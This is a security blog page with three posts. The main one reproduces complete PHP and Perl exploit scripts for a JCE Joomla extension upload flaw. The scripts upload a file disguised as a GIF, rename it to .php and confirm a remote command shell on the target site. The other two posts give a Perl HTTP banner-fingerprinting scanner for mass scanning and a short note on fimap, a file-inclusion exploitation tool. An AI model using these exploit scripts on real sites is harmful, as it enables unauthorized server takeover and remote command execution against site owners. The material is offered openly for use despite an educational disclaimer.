lo0.ro cat /dev/null > stupidity – nobody is safe

12Oct/110

JCE Joomla Extension Remote File Upload

PHP Version:
[cc lang="php"] ######################################### www.bugreport.ir
########################################
#
# AmnPardaz Security Research & Penetration Testing Group
#
#
# Title: Exploit for JCE Joomla Extension (Auto Shell
Uploader) V0.1 - PHP Version
# Vendor: http://www.joomlacontenteditor.net
# Vulnerable Version: JCE 2.0.10 (prior versions also may be affected)
# Exploitation: Remote with browser
# Original Advisory: http://www.bugreport.ir/index_78.htm
# Vendor supplied patch:

http://www.joomlacontenteditor.net/news/item/jce-2011-released

# CVSS2 Base Score: (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5
# Coded By: Mostafa Azizi
###################################################################################################

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'

JCE Joomla Extension
Remote File Upload

enctype="multipart/form-data" method="post">

hostname
(ex:www.sitename.com): class="Stile5">*

path (ex: /joomla/ or
just / ): class="Stile5">*

Please specify a file to upload:
 color="#FF0000"> *

specify a port (default is 80):
 class="Stile5">

Proxy (ip:port):
 class="Stile5">

color="#FF0000">* fields are
required

';

function sendpacket($packet,$response = 0,$output = 0,$s=0)
{
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
global $proxy, $host, $port, $html, $user, $pass;
if ($proxy == '')
{
$ock = fsockopen($host,$port);
stream_set_timeout($ock, 5);
if (!$ock)
{
echo ' No response from '.htmlentities($host).'
...
';
die;
}
} else
{
$parts = explode(':',$proxy);
echo 'Connecting to proxy:
'.$parts[0].':'.$parts[1].' ...

';
$ock = fsockopen($parts[0],$parts[1]);
stream_set_timeout($ock, 5);
if (!$ock)
{
echo 'No response from proxy...
';
die;
}
}

fputs($ock,$packet);
if ($response == 1)
{
if ($proxy == '')
{
$html = '';
while (!feof($ock))
{
$html .= fgets($ock);
}
} else
{
$html = '';
while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html .= fread($ock,1);
}
}
} else $html = '';

fclose($ock);
if ($response == 1 && $output == 1) echo nl2br(htmlentities($html));
if ($s==1){
$count=0;
$res=nl2br(htmlentities($html));
$str =
array('2.0.11</title','2.0.12 foreach ($str as $value){
$pos = strpos($res, $value);
if ($pos === false) {
$count=$count++;
} else {
echo "Target patched.

";
die();
}
}
if ($count=10) echo 'Target is
exploitable.

';
}
}

$host = $_POST['host'];
$path = $_POST['path'];
$port = $_POST['port'];
$proxy = $_POST['proxy'];

if (isset($_POST['Submit']) && $host != '' && $path != '')
{

$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die(' color=white>Error... check the path!');}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);

/* Packet 1 --> Checking Exploitability */
$packet = "GET
".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";

sendpacket($packet,1,0,1);

/* Packet 2 --> Uploading shell as a gif file */

$content = "GIF89a1\n";
$content .= file_get_contents($_FILES['datafile']['tmp_name']);
$data = "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
$data .= "/\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\";
filename=\"\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data;
name=\"upload-overwrite\"\r\n\r\n";
$data .= "0\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\";
filename=\"0day.gif\"\r\n";
$data .= "Content-Type: image/gif\r\n\r\n";
$data .= "$content\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "0day\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
$data .= "upload\r\n";
$data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";
$packet = "POST
".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743
HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
$packet .= "Content-Type: multipart/form-data;
boundary=---------------------------41184676334\r\n";
$packet .= "Accept-Language: en-us,en;q=0.5\r\n";
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$packet .= "Cookie:
6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743;
jce_imgmanager_dir=%2F;
__utma=216871948.2116932307.1317632284.1317632284.1317632284.1;
__utmb=216871948.1.10.1317632284; __utmc=216871948;
__utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Proxy-Connection: close\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n";
$packet .= $data;

sendpacket($packet,0,0,0);

/* Packet 3 --> Change Extension from .gif to .php */

$packet = "POST
".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n";
$packet .= "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-US,en;q=0.8\r\n";
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded;
charset=utf-8\r\n";
$packet .= "Accept-Encoding: deflate\n";
$packet .= "X-Request: JSON\r\n";
$packet .= "Cookie:
__utma=216871948.2116932307.1317632284.1317639575.1317734968.3;
__utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
__utmb=216871948.20.10.1317734968; __utmc=216871948;
jce_imgmanager_dir=%2F;
6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";
$ren
="json={\"fn\":\"folderRename\",\"args\":[\"/0day.gif\",\"0day.php\"]}";
$packet .= "Content-Length: ".strlen($ren)."\r\n\r\n";
$packet .= $ren."\r\n\r\n";

sendpacket($packet,1,0,0);

/* Packet 4 --> Check for successfully uploaded */

$packet = "Head ".$p."/images/stories/0day.php HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";

sendpacket($packet,1,0,0);

if(stristr($html , '200 OK') != true)
{echo "Exploit Faild...";} else echo
"Exploit
Succeeded...
http://$host:$port$path"."/images/stories/0day.php";
}
?>[/cc]

Perl Version:

[cc lang="perl"]######################################### www.bugreport.ir
########################################
#
# AmnPardaz Security Research & Penetration Testing Group
#
#
# Title: Exploit for JCE Joomla Extension (Auto Shell
Uploader) V0.1 - PHP Version
# Vendor: http://www.joomlacontenteditor.net
# Vulnerable Version: JCE 2.0.10 (prior versions also may be affected)
# Exploitation: Remote with browser
# Original Advisory: http://www.bugreport.ir/index_78.htm
# Vendor supplied patch:

http://www.joomlacontenteditor.net/news/item/jce-2011-released

# CVSS2 Base Score: (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5
# Coded By: Mostafa Azizi
###################################################################################################
use IO::Socket;
use LWP::Simple;
system("cls");
if(!defined($ARGV[0])) {
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell
Uploader) V0.1 .::.\n\n";
print "\t|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net)
||||\n\n";
print "\t+--> Usage: perl $0 <--+\n";
print "\t+--> Example: perl $0 localhost <--+\n\n";
exit; }
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell
Uploader) V0.1 .::.\n\n";
print "\t|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net)
||||\n\n";
$TARGET = $ARGV[0];
$PORT = "80";
$SCRIPT =
"/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20";
$SHELL = "/images/stories/0day.php?cmd=";
$HTTP = "http://";

$header1G = "GET $SCRIPT HTTP/1.1";
$header1H = "HEAD /images/stories/0day.php HTTP/1.1";
$header1P = "POST
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b
HTTP/1.1";
$header1P2 = "POST
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
HTTP/1.1";
$header2 = "Host: $TARGET";
$header3 = "User-Agent: BOT/0.1 (BOT for JCE)";
$header4 = "Content-Type: multipart/form-data;
boundary=---------------------------41184676334";
$header5 = "Content-Length: 769";
$header6 = "-----------------------------41184676334";
$header7 = 'Content-Disposition: form-data; name="upload-dir"';
$header8 = '/';
$header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""';
$header10 = 'Content-Type: application/octet-stream';
$header11 = 'Content-Disposition: form-data; name="upload-overwrite"';
$header12 = "0";
$header13 = 'Content-Disposition: form-data; name="Filedata";
filename="0day.gif"';
$header14 = 'Content-Type: image/gif';
$header15 = 'GIF89aG';
$header16 = "";
$header17 = 'Content-Disposition: form-data; name="upload-name"';
$header18 = '0day';
$header19 = 'Content-Disposition: form-data; name="action"';
$header20 = 'upload';
$header21 = "-----------------------------41184676334--";
$header22 = 'X-Request: JSON';
$header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8';
$header25 = 'json={"fn":"folderRename","args":["/0day.gif","0day.php"]}';
$header24 = "Content-Length: ".length($header25)."";

############################################### Packet 1 --> Checking
Exploitability #########################################################
print "\n[*] Checking Exploitability ...\n\n";
sleep 2;
$pageURL=$TARGET.$SCRIPT;
$simplePage=get($pageURL);
@arr =
("2.0.11 while (($count!=10) && ($die != 1)) {
foreach $arr(@arr){
if ($simplePage =~ m/$arr/) {
print "\n[*] Target patched.\n\n";
$die = 1;
} else {
$count++;
}
}
}
if ($count==5) {print "[*] Target is exploitable.\n\n"};
############################################### Packet 2 --> Uploading
shell as a gif file
#########################################################
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET"
,PeerPort=>"$PORT")
|| die "Can't connect to $TARGET";
print "[*] Trying to upload 0day.gif ...\n\n";
print $remote
"$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n";
sleep 2;
############################################### Packet 3 --> Change
Extension from .gif to .php
#########################################################
print "[*] Trying to change extension from .gif to .php ...\n\n";
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET"
,PeerPort=>"$PORT")
|| die "Can't connect to $TARGET";
print $remote
"$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n";
############################################### Packet 4 --> Check for
successfully uploaded
#########################################################
$shellurl=$TARGET.$SHELL;
$output=get($shellurl);
while ($output = <$remote> ) {
if ($output =~ /200 OK/) {
print "[+] 0day.php was successfully uploaded\n\n";
print "[+] Path:".$TARGET.$SHELL."id\n";
}}[/cc]

Tagged as: , , , , , No Comments
30Aug/110

plomp http banner retrieval and analysis

[cc lang="perl"]#!/usr/bin/perl
#
# plomp by andrew cook (andrew-cook@live.com) (efnet: sshlong)
#
# high speed http(80) banner retrieval an analysis. plomp grabs the version
# info from the banner if present and reports it. However, by also sending
# a series malformed requests to the server plomp is able to determine if
# the version information in the banner has been altered.
#
# USAGE: plomp -t -n
#

use IO::Socket;
use Getopt::Std;

@http_report = ();

$spawns=0;
%options=();
getopts("n:t:", \%options);
if($options{n} > 0 && $options{n} < 1000) {
$max_children=$options{n};
} else {
$max_children=9;
}

if($options{t}) {
$hostlist=$options{t};
} else {
die "usage: plomp -t -n ";
}

open(TARGETS,$hostlist);
@targets=;
chomp(@targets);
foreach(@targets) {
if( fork() == 0) {
http_scan($_);

print("$target http report\n");
print("------------------------------------------\n");
print("apache: $http_report[1]\n");
print("iis: $http_report[2]\n");
print("Sun: $http_report[3]\n");
print("$http_report[4]\n\n");

exit;

} else {
$spawns++;
if($spawns >= $max_children) {
wait();
$spawns--;
}
}
}

sub http_scan() {

my $apache=0;
my $iis=0;
my $sunjava=0;

my @lines;
$target=$_;
my $http_head = "HEAD / HTTP/1.0\n\n";
my $http_delete = "DELETE / HTTP/1.0\n\n";
my $http_get = "GET / HTTP/6.9\n\n";
my $http_improper = "POOP / HTTP/1.0\n\n";
my $http_port=80;

if( my $shitbox = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $target,
PeerPort => $http_port,
Timeout => '5'
) ) {
print $shitbox "$http_head";
@lines=<$shitbox>;
foreach $match (@lines) {
if($match =~ /server/i) {
$resp1=$match;
}

}
}
if( my $shitbox = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $target,
PeerPort => $http_port,
Timeout => '9'
) ) {
print $shitbox "$http_delete";
@lines=<$shitbox>;
foreach(@lines) {
if($_ =~ /405 Method/) {
$apache += 1;
} elsif($_ =~ /501/) {
$iis += 1;
}
}
}
if(my $shitbox = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $target,
PeerPort => $http_port,
Timeout => '9'
) ) {
print $shitbox "$http_get";
@lines=<$shitbox>;
foreach(@lines) {
if($_ =~ /400/) {
$resp3=$_;
}
elsif($_ =~ /505 HTTP/i) {
$resp3+$_;
$sunjava += 1;
}
}
}
if(my $shitbox = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $target,
PeerPort => $http_port,
Timeout => '9'
) ) {
print $shitbox "$http_improper";
@lines=<$shitbox>;
foreach(@lines) {
if($_ =~ /200/) {
$apache += 1;
} elsif($_ =~ /400/) {
$iis += 1;
$sunjava += 1;
}
}
}
if($resp1 =~ /apache/i) { $apache += 1; }
elsif($resp1 =~ /iis/i) { $iis += 1; }
elsif($resp1 =~ /sun/i) { $sunjava += 1; }

@http_report[0] = $target;
@http_report[1] = ($apache * 33) . "%";
@http_report[2] = ($iis * 33) . "%";
@http_report[3] = ($sunjava * 33) . "%";
@http_report[4] = $resp1;
}[/cc]

usage:
[cc lang="bash"]plomp -t -n [/cc]

Tagged as: , , , , , , , , No Comments
26May/110

fimap – find, prepare, audit, exploit – local file inclusion and remote file inclusion

fimap is a little python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It's currently under heavy development but it's usable.

The goal of fimap is to improve the quality and security of your website.

"Do not use this tool on servers where you don't have permission to pentest!

I am dead serious." The author

Download | Twitter

usage:

[cc lang="bash"]fimap -u "http://localhost/vulnerable.php?inc=index.php"[/cc]

Tagged as: , , , No Comments
   

Add to Google

Disclaimer

This website was created for educational purposes. The owner will not take any responsibility for any action you cause using the information shown in this website. Please do not contact me with blackhat type hacking requests. Thanks

Categories

Tags

backup backup exec bruteforce debian directadmin DoS download exploit hack hacking how-to install install windows 7 lfi linux pentest perl php poc python rfi scanner script scripts secure code Security security scanner share shell social engineering source code sqli SQL injection sqli scanners ssh tool tools tutorial upload shell vbulletin Web Application Scanner windows windows 7 usb wordpress xss

Meta